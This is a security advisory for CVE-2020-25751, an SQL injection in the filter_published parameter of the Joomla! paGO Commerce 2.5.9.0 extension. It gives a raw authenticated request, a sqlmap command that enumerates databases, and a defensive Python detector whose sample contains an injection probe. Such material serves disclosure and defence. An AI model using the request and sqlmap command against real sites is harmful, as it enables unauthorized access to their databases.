
(CVE-2020-25751) Joomla! paGO Commerce 2.5.9.0 SQL Injection Vulnerability

1. Vulnerability Overview

Joomla! is an open-source, cross-platform content management system (CMS) built on PHP and MySQL by the US-based Open Source Matters team.

Version 2.5.9.0 of the Joomla! paGO Commerce extension contains a SQL injection vulnerability. The flaw lies in the filter_published parameter of administrator/index.php?option=com_pago&view=comments. An attacker can exploit it to execute unauthorized SQL commands.

2. Affected Versions

Joomla! paGO Commerce 2.5.9.0

3. Reproduction

POST /joomla/administrator/index.php HTTP/1.1
Host: www.0-sec.org:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
Origin: http://localhost
Connection: close
Referer: http://www.0-sec.org/joomla/administrator/index.php?option=com_pago&view=comments
Cookie: 4bde113dfc9bf88a13de3b5b9eabe495=sp6rp5mqnihh2i323r57cvesoe; crisp-client%2Fsession%2F0ac26dbb-4c2f-490e-88b2-7292834ac0e9=session_a9697dd7-152d-4b1f-a324-3add3619b1e1
Upgrade-Insecure-Requests: 1

filter_search=&limit=10&filter_published=1&task=&controller=comments&boxchecked=0&filter_order=id&filter_order_Dir=desc&5a672ab408523f68032b7bdcd7d4bb5c=1

sqlmap PoC (the -r option takes a file containing the saved request above):

sqlmap -r www.0-sec.org --dbs --risk=3 --level=5 --random-agent -p filter_published
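As an added defensive example (not part of the original writeup), the following Python check flags POST requests to the Joomla administrator entry point whose filter_published value is not the empty string or an integer, which is the only shape that status filter legitimately takes. The sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlparse

# Joomla admin entry point targeted in the writeup; the paGO comments view
# posts its list filters as a form body to this path.
ADMIN_PATH = "/administrator/index.php"
# filter_published is a publish-state filter: '' (all) or an integer is expected.
SAFE_VALUE = re.compile(r"^-?\d*$")


def parse_request(raw: str):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, urlparse(target).path, headers, body


def suspicious_filter_published(raw: str):
    """Return the offending filter_published value, or None if the request looks benign."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or not path.endswith(ADMIN_PATH):
        return None
    # Only look at traffic aimed at the paGO comments list.
    if "com_pago" not in headers.get("referer", "") and "controller=comments" not in body:
        return None
    for value in parse_qs(body, keep_blank_values=True).get("filter_published", []):
        if not SAFE_VALUE.match(value):
            return value
    return None


# Constructed sample traffic (not captured from a real system).
BENIGN = ("POST /joomla/administrator/index.php HTTP/1.1\r\n"
          "Host: example.test\r\n"
          "Referer: http://example.test/joomla/administrator/index.php?option=com_pago&view=comments\r\n"
          "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
          "filter_search=&limit=10&filter_published=1&controller=comments&filter_order=id")
PROBE = BENIGN.replace("filter_published=1", "filter_published=1%27%20OR%201%3D1")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("probe", PROBE)):
        print(label, "->", suspicious_filter_published(req))
```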

References

https://www.nmmapper.com/st/exploitdetails/48811/43057/joomla-pago-commerce-2590-sql-injection-authenticated/